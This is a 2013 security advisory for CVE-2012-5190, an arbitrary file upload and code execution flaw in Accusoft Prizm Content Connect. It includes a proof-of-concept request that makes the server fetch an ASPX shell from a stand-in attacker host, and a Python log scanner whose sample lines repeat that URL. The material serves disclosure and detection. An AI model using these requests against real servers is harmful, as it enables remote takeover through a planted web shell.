Accusoft Prizm Content Connect Arbitrary File Upload and Code Execution

2013.01.10
Risk: High
Local: No
Remote: Yes
CWE: CWE-434


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

In the course of our security assessment consulting we often find 0day vulnerabilities and report them to vendors. In this particular case the vendor has unfortunately shown a general disregard for the security risk of this uncovered vulnerability, which was originally disclosed privately to them on September 27th 2012. All original deadlines and even their own proposed fix dates have expired; as such, we're releasing this advisory so that affected customers can update their WAF/IDS/IPS systems to protect themselves from this obvious vulnerability. We hope the Accusoft team addresses this vulnerability in a patch or upcoming release as soon as possible. This vulnerability has been assigned CVE-2012-5190.

Take care,
Include Security Research Team

Arbitrary File Upload and Execution in Prizm Content Connect default.aspx

Prizm Content Connect web document viewer converts a variety of formats into Adobe Flash objects so that they can be viewed in a web browser. If Prizm Content Connect is configured according to the installation instructions, it will be vulnerable to arbitrary remote code execution.

By default, the Prizm software includes a script called default.aspx which accepts a document parameter that is a remote URL. This script downloads the remote document, saves it to the server with an attacker-supplied filename extension, and reveals the path to the document on the local filesystem. Since, in the default configuration, the download path on the local filesystem resides within the web server's web root, the attacker can cause default.aspx to download a malicious ASPX script and save it with a dangerous .aspx extension. The attacker can then request the ASPX script from the server, causing the server to execute possibly malicious code contained within.

Vulnerable versions

This vulnerability was discovered in the following version, but we anticipate other versions to be vulnerable as well:

· Prizm Content Connect 5.1

Proof of concept

First, the attacker causes the Prizm Content Connect software to download the malicious ASPX file:

    http://victim.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx

The resulting page discloses the filename to which the ASPX file was downloaded, e.g.:

    Document Location: C:\Project\
    Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx
    Temp Location: C:\tempcache\

The attacker then requests the ASPX shell from the root of the website:

    http://victim.example.com/ajwyfw45itxwys45fgzomrmv.aspx

Assigned CVE#

CVE-2012-5190
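The advisory is released so that customers can update WAF/IDS/IPS coverage; the following added example (not part of the original advisory and not vendor code) shows one way to flag the described request pattern in IIS W3C logs. The log field order, the extension list, the function names and the sample log lines are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs, unquote, urlsplit
import posixpath

# Extensions IIS/ASP.NET may execute or treat as configuration (assumed list; tune per site).
EXECUTABLE_EXTS = {".aspx", ".ashx", ".asmx", ".asp", ".cshtml", ".config"}
# Assumed W3C field order; match it to the #Fields header of your own logs.
FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

def remote_script_fetch(stem, query):
    """Return the remote URL if default.aspx is asked to fetch a script file, else None."""
    if not stem.lower().endswith("/default.aspx"):
        return None
    params = {k.lower(): v for k, v in parse_qs(query).items()}
    for value in params.get("document", []):
        url = unquote(value).strip()  # second decode catches double-encoded values
        parts = urlsplit(url)         # urlsplit lowercases the scheme
        if parts.scheme not in ("http", "https", "ftp"):
            continue
        ext = posixpath.splitext(parts.path.rstrip(". "))[1].lower()
        if ext in EXECUTABLE_EXTS:
            return url
    return None

def scan(lines):
    """Return (client_ip, url) for each log line matching the pattern."""
    hits = []
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue  # skip W3C directives and blank lines
        rec = dict(zip(FIELDS, line.split()))
        url = remote_script_fetch(rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", ""))
        if url:
            hits.append((rec["c-ip"], url))
    return hits

# Constructed sample log lines (documentation IP ranges, example hostnames).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2013-01-10 09:14:02 192.0.2.10 GET /default.aspx document=http://docs.example.net/report.pdf 200
2013-01-10 09:15:40 198.51.100.7 GET /default.aspx document=http://attacker.example.org/aspxshell.aspx 200
2013-01-10 09:16:11 198.51.100.7 GET /Default.aspx document=http%253A%252F%252Fattacker.example.org%252Fa.ASPX 200
2013-01-10 09:17:30 192.0.2.10 GET /viewer.aspx document=http://docs.example.net/x.aspx 200
""".splitlines()

if __name__ == "__main__":
    for ip, url in scan(SAMPLE_LOG):
        print(ip, url)
```

A hit is a lead for review rather than proof of compromise: check whether a file with a matching extension was subsequently written under the web root and requested.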

References:

http://seclists.org/fulldisclosure/2013/Jan/55

